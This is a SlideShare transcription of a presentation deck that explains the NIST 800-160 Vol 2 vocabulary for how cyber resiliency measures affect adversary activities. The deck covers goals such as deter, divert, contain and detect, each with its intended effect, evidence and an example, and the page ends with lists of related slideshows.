SlideShare a Scribd company logo
Talking SoS
w/Shawn Riley
Episode 3
Cyber Resiliency Effects On Adversary Activities
Ref: NIST 800-160 Vol 2 App I
This video presents a vocabulary for stating claims or hypotheses about
the effects of cyber mission assurance decisions on cyber adversary
behavior. Cyber mission assurance decisions include choices of cyber
defender actions, architectural decisions, and selections and uses of
technologies to improve cyber security, resiliency, and defensibility (i.e.,
the ability to address ongoing adversary activities). The vocabulary
enables claims and hypotheses to be stated clearly, comparably across
different assumed or real-world environments, and in a way that
suggests evidence that might be sought but is independent of how the
claims or hypotheses might be evaluated. The vocabulary can be used
with multiple modeling and analysis techniques, including Red Team
analysis, game-theoretic modeling, attack tree and attack graph
modeling, and analysis based on the cyber attack lifecycle (also referred
to as cyber kill chain analysis or cyber campaign analysis).
Redirect – Direct adversary activities away from defender
chosen targets
Preclude – Ensure that specific threat events do not have an
effect.
Impede – Make it more difficult for threat events to cause
adverse impacts or consequences.
Limit – Restrict the consequences of threat events by limiting
the damage or effects they cause in terms of time, system
resources, and/or mission or business impacts.
Expose – Reduce risk due to ignorance of threat events and
possible replicated or similar threat events in the same or
similar environments.
Defender
Goals
Defender’s Goal: Redirect – Direct adversary activities away
from defender chosen targets
Redirect
Deter
Divert
Deceive
Defender Goal –
Deter
• Intended Effect - Discourage the adversary from
undertaking further activities, by instilling fear (e.g., of
attribution or retribution) or doubt that those activities
would achieve intended effects (e.g., that targets exist).
• Expected Result - The adversary ceases or suspends
activities.
• Effect on Risk - Reduce likelihood of occurrence.
• Evidence - Activities attributable to the adversary are no
longer observed by the organization. Activities
attributable to the adversary are no longer observed by
other organizations and this fact is made known via
threat intelligence information sharing.
• Example - The defender uses disinformation to make it
appear that the organization is better able to detect
attacks than it is, and is willing to launch major counter
strikes. The result is that the adversary chooses to not
launch attack due to fear of detection and reprisal.
Defender Goal –
Divert
• Intended Effect - Lead the adversary to direct activities
away from defender chosen targets.
• Expected Result - The adversary refocuses activities on
different targets (e.g., other organizations, defender-
chosen alternate targets). The adversary’s efforts are
wasted.
• Effect on Risk - Reduce likelihood of occurrence.
• Example - The defender uses selectively planted false
information (disinformation) and honeynets
(misdirection) to cause an adversary to focus its
malware at virtual sandboxes, while at the same time
employing obfuscation to hide the actual resources. The
result is that the adversary’s attacks are directed away
from critical resources.
• Evidence - Adversary activities are directed towards
defender-chosen alternate targets (e.g., to a special
enclave). Activities attributable to the adversary are
observed by other organizations and made known via
threat intelligence information sharing.
Defender Goal –
Deceive
• Intended Effect - Lead the adversary to believe false
information about defended systems, missions, or
organizations, or about defender capabilities or TTPs.
• Expected Result - The adversary’s efforts are wasted, as
the assumptions on which the adversary bases attacks
are false.
• Effect on Risk - Reduce likelihood of occurrence and/or
reduce likelihood of impact.
• Example - The defender strategically places false
information (disinformation) about the cybersecurity
investments that it plans to make. As a result, the
adversary’s malware development is wasted by being
focused on countering nonexistent cybersecurity
protections.
• Evidence - Adversary activities reveal that the adversary
is relying on false information (e.g., a dummy account is
spear phished, delivered malware is tailored to a
simulated environment).
Defender’s Goal: Preclude – Ensure that specific threat events
do not have an effect.
Preclude
Expunge
Preempt
Prevent
Defender Goal –
Expunge
• Intended Effect - Remove unsafe, incorrect, or corrupted
resources that could cause damage.
• Expected Result - The adversary loses a capability for
some period, as adversary directed threat mechanisms
(e.g., malicious code) are removed. Adversary-controlled
resources are so badly damaged that they cannot
perform any function or be restored to a usable
condition without being entirely rebuilt.
• Effect on Risk - Reduce likelihood of impact of
subsequent events in the same threat scenario.
• Example - The defender uses virtualization to refresh
critical software (non-persistent services) at random
intervals (temporal unpredictability). As a result, the
adversary’s malware that is implanted in the software is
expunged.
• Evidence - Removal of malware or of privileges from
adversary-controlled resources.
Defender Goal –
Preempt
• Intended Effect - Forestall or avoid conditions under
which the threat event could occur or result in an effect.
• Expected Result - The adversary’s resources cannot be
applied and/or the adversary cannot perform activities
(e.g., because resources are destroyed or made
inaccessible).
• Effect on Risk - Reduce likelihood of occurrence and/or
reduce likelihood of impact.
• Example - Critical software is not assembled (adaptive
management) or activated (non-persistent services) until
it is needed. The adversary, therefore, cannot perform
reconnaissance on, and tailor malware targeted to, the
software.
• Evidence - The adversary’s resources are observed to be
denied (e.g., destroyed, made inaccessible or unusable).
Defender Goal –
Prevent
• Intended Effect - Create conditions under which the
threat event cannot be expected to result in an effect.
• Expected Result - The adversary’s efforts are wasted, as
the assumptions on which the adversary based its attack
are no longer valid and as a result, the intended effects
cannot be achieved.
• Effect on Risk - Reduce likelihood of impact.
• Example - Subtle variations in critical software are
implemented (synthetic diversity), with the result that
the adversary’s malware is no longer able to
compromise the targeted software.
• Evidence - Logs or other captured data provide evidence
that the activity occurred but had no effects.
Defender Goal: Impede – Make it more difficult for threat events
to cause adverse impacts or consequences.
Impede
Contain
Degrade
Delay
Defender Goal –
Contain
• Intended Effect - Restrict the effects of the threat event
to a limited set of resources.
• Expected Result - The value of the activity to the
adversary, in terms of achieving the adversary’s goals, is
reduced.
• Effect on Risk - Reduce level of impact.
• Example - The defender organization makes changes to a
combination of internal firewalls and logically separated
networks (dynamic segmentation) to isolate enclaves in
response to detection of malware, with the result that
the effects of the malware is limited to just initially
infected enclaves.
• Evidence - Damage assessment, in terms of
• (Scope) The number of affected resources
• (Impact) A function of
• The number of affected resources and their
value (e.g., criticality)
• Duration and the mission or operational cost per
unit time
Defender Goal –
Degrade
• Intended Effect - Decrease the likelihood that a given threat
event will have a given level of effectiveness or impact.
• Expected Result - The adversary achieves some but not all
intended effects. The adversary achieves all intended effects but
only after taking additional actions.
• Effect on Risk - Reduce likelihood of impact and reduce level of
impact.
• Example - The defender uses multiple browsers and operating
systems (architectural diversity) on both end user systems and
some critical servers. The result is that malware that is targeted at
specific software can only compromise a subset of the targeted
systems; a sufficient number continue to operate to keep mission
going, although in degraded mode.
• Evidence - The number of resources affected by the adversary is
lower than for prior instances of the activity. The severity of the
impacts caused by the adversary activity is less than for prior
instances of the activity. Malware or other attack vectors
attributable to the adversary are crafted or tailored, based on
failures of prior activities attributable to the same adversary to
achieve effects. Repeated activities (e.g., to establish information
channels, to start processes) are attributable to the same
adversary.
Defender Goal –
Delay
• Intended Effect - Increase the amount of time needed for a
threat event to result in adverse impacts.
• Expected Result - The adversary achieves the intended
effects but may not achieve them within the intended
period. The adversary’s activities may, therefore, be
exposed to greater risk of detection and analysis.
• Effect on Risk - Reduce likelihood of impact and reduce
level of impact.
• Example - The protection measures (e.g., access controls,
encryption) allocated to resources increase in number and
strength based on resource criticality (calibrated defense-
in-depth). The frequency of authentication challenges
varies randomly (temporal unpredictability) and with
increased frequency for more critical resources. The result
is that it takes the attacker more time to successfully
compromise the targeted resources.
• Evidence - The length of time between an initial event and
its effects, as determined by forensic or other analysis, is
increased.
Defender Goal: Limit – Restrict the consequences of threat events
by limiting the damage or effects they cause in terms of time,
system resources, and/or mission or business impacts.
Limit
Shorten
Recover
Defender Goal –
Shorten
• Intended Effect - Limit the duration of a threat event or
the conditions caused by a threat event.
• Expected Result - The time period during which the
adversary’s activities have their intended effects is
limited.
• Effect on Risk - Reduce level of impact.
• Example - The defender employs a diverse set of
suppliers (supply chain diversity) for time-critical
components. As a result, when an adversary’s attack on
one supplier causes it to shut down, the defender can
increase its use of the other suppliers, thus shortening
the time when it is without the critical components.
• Evidence - Damage assessment, in terms of (Time). The
duration of an outage or of degraded functionality.
Defender Goal –
Recover
• Intended Effect - Roll back the consequences of a threat
event, particularly with respect to mission or business
impairment.
• Expected Result - The adversary fails to retain mission or
business impairment due to recovery of the capability to
perform key missions or business operations.
• Effect on Risk - Reduce level of impact.
• Example - Resources determined to be corrupted or
suspect (integrity checks, behavior validation) are
restored from a clean copy (protected backup and
restore).
• Evidence - Recovery metrics, including
• (Functionality) Level of performance (typically
expressed in terms of Measures of Effectiveness
(MOEs), Measures of Performance (MOPs), or Key
Performance Parameters (KPPs)).
• (Assurance) Degree of trustworthiness or
confidence in restored resources.
Defender goal: Expose – Reduce risk due to ignorance of threat
events and possible replicated or similar threat events in the
same or similar environments.
Expose
Detect
Scrutinize
Reveal
Defender Goal –
Detect
• Intended Effect - Identify threat events or their effects
by discovering or discerning the fact that an event is
occurring, has occurred, or (based on indicators,
warnings, and precursor activities) is about to occur.
• Expected Result - The adversary’s activities become
susceptible to defensive responses.
• Effect on Risk - Reduce likelihood of impact and reduce
level of impact (depending on responses).
• Example - The defender continually moves its sensors
(functional relocation of sensors), often at random times
(temporal unpredictability), to common points of egress
from the organization. They combine this with the use of
beacon traps (tainting). The result is that the defender
can quickly detect efforts by the adversary to exfiltrate
sensitive information.
• Evidence - Adversary activities are detected, or
indicators, warnings, and/or precursor activities are
observed.
Defender Goal –
Scrutinize
• Intended Effect - Analyze threat events and artifacts associated
with threat events, particularly with respect to patterns of
exploiting vulnerabilities, predisposing conditions, and
weaknesses, to inform more effective detection and risk
response.
• Expected Result - The adversary loses the advantages of
uncertainty, confusion, and doubt. The defender understands
the adversary better, based on analysis of adversary activities,
including the artifacts (e.g., malicious code) and effects
associated with those activities and on correlation of activity
specific observations with other activities (as feasible), and thus
can recognize adversary TTPs.
• Effect on Risk - Reduce likelihood of impact.
• Example - The defender deploys honeynets (misdirection),
inviting attacks by the defender, allowing the defender to apply
their TTPs in a safe environment. The defender then analyzes
(malware and forensic analysis) the malware captured in the
honeynet to determine the nature of the attacker’s TTPs,
allowing it to develop appropriate defenses.
• Evidence - Number and quality (e.g., correctness, usefulness) of
malware signatures and characteristics. Number and quality
(e.g., degree of confirmation) of observables and indicators.
Distinct threat actors and/or campaigns being observed.
Defender Goal –
Reveal
• Intended Effect - Increase awareness of risk factors and relative
effectiveness of remediation approaches across the stakeholder
community, to support common, joint, or coordinated risk
response.
• Expected Result - The adversary loses the advantage of surprise
and possible deniability. The adversary’s ability to compromise
one organization’s systems to attack another organization is
impaired, as awareness of adversary characteristics and
behavior across the stakeholder community (e.g., across all
computer security incident response teams that support a given
sector, which might be expected to be attacked by the same
actor or actors) is increased.
• Effect on Risk - Reduce likelihood of impact, particularly in the
future.
• Example - The defender participates in threat information
sharing and uses dynamically updated threat intelligence data
feeds (dynamic threat modeling) to inform actions (adaptive
management).
• Evidence - Distinct threat actors, campaigns, and/or TTPs
observed by multiple organizations. Degree of confidence in
attribution of events to threat actors or campaigns.

More Related Content

What's hot

Review of Enterprise Security Risk Management
Review of Enterprise Security Risk ManagementReview of Enterprise Security Risk Management
Review of Enterprise Security Risk Management
Rand W. Hirt
 
ISO 27005 Risk Assessment
ISO 27005 Risk AssessmentISO 27005 Risk Assessment
ISO 27005 Risk Assessment
Smart Assessment
 
Risk assesment
Risk assesmentRisk assesment
Risk assesment
Arvind Kumar
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
Marcin Ludwiszewski
 
Doug brown
Doug brownDoug brown
Doug brown
NASAPMC
 
Lightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
Lightweight Cybersecurity Risk Assessment Tools for CyberinfrastructureLightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
Lightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
jbasney
 
Administering security
Administering securityAdministering security
Administering security
G Prachi
 
Preparing for future attacks - the right security strategy
Preparing for future attacks - the right security strategyPreparing for future attacks - the right security strategy
Preparing for future attacks - the right security strategy
RapidSSLOnline.com
 
Cyber Incident Response Team - NIMS - Public Comment
Cyber Incident Response Team  -  NIMS  -  Public CommentCyber Incident Response Team  -  NIMS  -  Public Comment
Cyber Incident Response Team - NIMS - Public Comment
David Sweigert
 
Risk analysis
Risk analysis  Risk analysis
Risk analysis
Arvind Kumar
 
Lifecycle of an advanced persistent threat
Lifecycle of an advanced persistent threatLifecycle of an advanced persistent threat
Lifecycle of an advanced persistent threat
Bee_Ware
 
Threat Based Risk Assessment
Threat Based Risk AssessmentThreat Based Risk Assessment
Threat Based Risk Assessment
Michael Lines
 
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
Andrea Montemaggio
 
Microsoft Risk Management
Microsoft Risk ManagementMicrosoft Risk Management
Microsoft Risk Management
Ulukman Mamytov
 
Risk Assessment and Threat Modeling
Risk Assessment and Threat ModelingRisk Assessment and Threat Modeling
Risk Assessment and Threat Modeling
sedukull
 
Information Serurity Risk Assessment Basics
Information Serurity Risk Assessment BasicsInformation Serurity Risk Assessment Basics
Information Serurity Risk Assessment Basics
Vidyalankar Institute of Technology
 
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAMINFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
Christopher Nanchengwa
 
Risk management in software engineering
Risk management in software engineeringRisk management in software engineering
Risk management in software engineering
deep sharma
 
Proactive vs. Reactive Approaches to Software Security Strategy
Proactive vs. Reactive Approaches to Software Security StrategyProactive vs. Reactive Approaches to Software Security Strategy
Proactive vs. Reactive Approaches to Software Security Strategy
Lindsey Landolfi
 

What's hot (19)

Review of Enterprise Security Risk Management
Review of Enterprise Security Risk ManagementReview of Enterprise Security Risk Management
Review of Enterprise Security Risk Management
 
ISO 27005 Risk Assessment
ISO 27005 Risk AssessmentISO 27005 Risk Assessment
ISO 27005 Risk Assessment
 
Risk assesment
Risk assesmentRisk assesment
Risk assesment
 
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...2020 11-15 marcin ludwiszewski - purple, red, blue  and others - rainbow team...
2020 11-15 marcin ludwiszewski - purple, red, blue and others - rainbow team...
 
Doug brown
Doug brownDoug brown
Doug brown
 
Lightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
Lightweight Cybersecurity Risk Assessment Tools for CyberinfrastructureLightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
Lightweight Cybersecurity Risk Assessment Tools for Cyberinfrastructure
 
Administering security
Administering securityAdministering security
Administering security
 
Preparing for future attacks - the right security strategy
Preparing for future attacks - the right security strategyPreparing for future attacks - the right security strategy
Preparing for future attacks - the right security strategy
 
Cyber Incident Response Team - NIMS - Public Comment
Cyber Incident Response Team  -  NIMS  -  Public CommentCyber Incident Response Team  -  NIMS  -  Public Comment
Cyber Incident Response Team - NIMS - Public Comment
 
Risk analysis
Risk analysis  Risk analysis
Risk analysis
 
Lifecycle of an advanced persistent threat
Lifecycle of an advanced persistent threatLifecycle of an advanced persistent threat
Lifecycle of an advanced persistent threat
 
Threat Based Risk Assessment
Threat Based Risk AssessmentThreat Based Risk Assessment
Threat Based Risk Assessment
 
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
SPS'20 - Designing a Methodological Framework for the Empirical Evaluation of...
 
Microsoft Risk Management
Microsoft Risk ManagementMicrosoft Risk Management
Microsoft Risk Management
 
Risk Assessment and Threat Modeling
Risk Assessment and Threat ModelingRisk Assessment and Threat Modeling
Risk Assessment and Threat Modeling
 
Information Serurity Risk Assessment Basics
Information Serurity Risk Assessment BasicsInformation Serurity Risk Assessment Basics
Information Serurity Risk Assessment Basics
 
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAMINFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
INFORMATION AND COMMUNICATIONS TECHNOLOGY PROGRAM
 
Risk management in software engineering
Risk management in software engineeringRisk management in software engineering
Risk management in software engineering
 
Proactive vs. Reactive Approaches to Software Security Strategy
Proactive vs. Reactive Approaches to Software Security StrategyProactive vs. Reactive Approaches to Software Security Strategy
Proactive vs. Reactive Approaches to Software Security Strategy
 

Similar to Talking SoS with Shawn Riley - Cyber Resiliency Effects on Adversary Activities

Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 
002.itsecurity bcp v1
002.itsecurity bcp v1002.itsecurity bcp v1
002.itsecurity bcp v1
Mohammad Ashfaqur Rahman
 
penetration test
penetration testpenetration test
penetration test
Hajer alriyami
 
DataShepherd Security
DataShepherd SecurityDataShepherd Security
DataShepherd Security
Jason Newell
 
Risk Assessment And Management
Risk Assessment And ManagementRisk Assessment And Management
Risk Assessment And Management
vikasraina
 
A Framework for Developing and Operationalizing Security Use Cases
A Framework for Developing and Operationalizing Security Use CasesA Framework for Developing and Operationalizing Security Use Cases
A Framework for Developing and Operationalizing Security Use Cases
Ryan Faircloth
 
325838924-Splunk-Use-Case-Framework-Introduction-Session
325838924-Splunk-Use-Case-Framework-Introduction-Session325838924-Splunk-Use-Case-Framework-Introduction-Session
325838924-Splunk-Use-Case-Framework-Introduction-Session
Ryan Faircloth
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And Analysis
Lalit Kale
 
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyySeccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
chaudhryzunair4
 
Future Cyber Attacks & Solution - Symantec
Future Cyber Attacks & Solution - SymantecFuture Cyber Attacks & Solution - Symantec
Future Cyber Attacks & Solution - Symantec
CheapSSLsecurity
 
Cyber Security Awareness Month 2017-Nugget 3
Cyber Security Awareness Month 2017-Nugget 3Cyber Security Awareness Month 2017-Nugget 3
Cyber Security Awareness Month 2017-Nugget 3
Chinatu Uzuegbu
 
What to Expect During a Vulnerability Assessment and Penetration Test
What to Expect During a Vulnerability Assessment and Penetration TestWhat to Expect During a Vulnerability Assessment and Penetration Test
What to Expect During a Vulnerability Assessment and Penetration Test
ShyamMishra72
 
Vulnerability Assessment
Vulnerability AssessmentVulnerability Assessment
Vulnerability Assessment
primeteacher32
 
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Shakas Technologies
 
Health information security session 4 risk management
Health information security session 4 risk managementHealth information security session 4 risk management
Health information security session 4 risk management
Dr. Lasantha Ranwala
 
Defense In Depth Using NIST 800-30
Defense In Depth Using NIST 800-30Defense In Depth Using NIST 800-30
Defense In Depth Using NIST 800-30
Kevin M. Moker, CFE, CISSP, ISSMP, CISM
 
ch01.ppt
ch01.pptch01.ppt
ch01.ppt
samsam693199
 
information security presentation topics
information security presentation topicsinformation security presentation topics
information security presentation topics
Olajide Kuku
 
educational content, educational contented educational content
educational content, educational contented educational contenteducational content, educational contented educational content
educational content, educational contented educational content
Olajide Kuku
 
INFORMATION SECURITY STUDY GUIDE for STUDENTS
INFORMATION SECURITY STUDY GUIDE for STUDENTSINFORMATION SECURITY STUDY GUIDE for STUDENTS
INFORMATION SECURITY STUDY GUIDE for STUDENTS
henlydailymotion
 

Similar to Talking SoS with Shawn Riley - Cyber Resiliency Effects on Adversary Activities (20)

Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
 
002.itsecurity bcp v1
002.itsecurity bcp v1002.itsecurity bcp v1
002.itsecurity bcp v1
 
penetration test
penetration testpenetration test
penetration test
 
DataShepherd Security
DataShepherd SecurityDataShepherd Security
DataShepherd Security
 
Risk Assessment And Management
Risk Assessment And ManagementRisk Assessment And Management
Risk Assessment And Management
 
A Framework for Developing and Operationalizing Security Use Cases
A Framework for Developing and Operationalizing Security Use CasesA Framework for Developing and Operationalizing Security Use Cases
A Framework for Developing and Operationalizing Security Use Cases
 
325838924-Splunk-Use-Case-Framework-Introduction-Session
325838924-Splunk-Use-Case-Framework-Introduction-Session325838924-Splunk-Use-Case-Framework-Introduction-Session
325838924-Splunk-Use-Case-Framework-Introduction-Session
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And Analysis
 
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyySeccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
Seccurity_Risk_Management.pptyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
 
Future Cyber Attacks & Solution - Symantec
Future Cyber Attacks & Solution - SymantecFuture Cyber Attacks & Solution - Symantec
Future Cyber Attacks & Solution - Symantec
 
Cyber Security Awareness Month 2017-Nugget 3
Cyber Security Awareness Month 2017-Nugget 3Cyber Security Awareness Month 2017-Nugget 3
Cyber Security Awareness Month 2017-Nugget 3
 
What to Expect During a Vulnerability Assessment and Penetration Test
What to Expect During a Vulnerability Assessment and Penetration TestWhat to Expect During a Vulnerability Assessment and Penetration Test
What to Expect During a Vulnerability Assessment and Penetration Test
 
Vulnerability Assessment
Vulnerability AssessmentVulnerability Assessment
Vulnerability Assessment
 
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
 
Health information security session 4 risk management
Health information security session 4 risk managementHealth information security session 4 risk management
Health information security session 4 risk management
 
Defense In Depth Using NIST 800-30
Defense In Depth Using NIST 800-30Defense In Depth Using NIST 800-30
Defense In Depth Using NIST 800-30
 
ch01.ppt
ch01.pptch01.ppt
ch01.ppt
 
information security presentation topics
information security presentation topicsinformation security presentation topics
information security presentation topics
 
educational content, educational contented educational content
educational content, educational contented educational contenteducational content, educational contented educational content
educational content, educational contented educational content
 
INFORMATION SECURITY STUDY GUIDE for STUDENTS
INFORMATION SECURITY STUDY GUIDE for STUDENTSINFORMATION SECURITY STUDY GUIDE for STUDENTS
INFORMATION SECURITY STUDY GUIDE for STUDENTS
 

Recently uploaded

GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
David Brossard
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Things to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUUThings to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUU
FODUU
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
Techgropse Pvt.Ltd.
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 

Recently uploaded (20)

GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Things to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUUThings to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUU
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
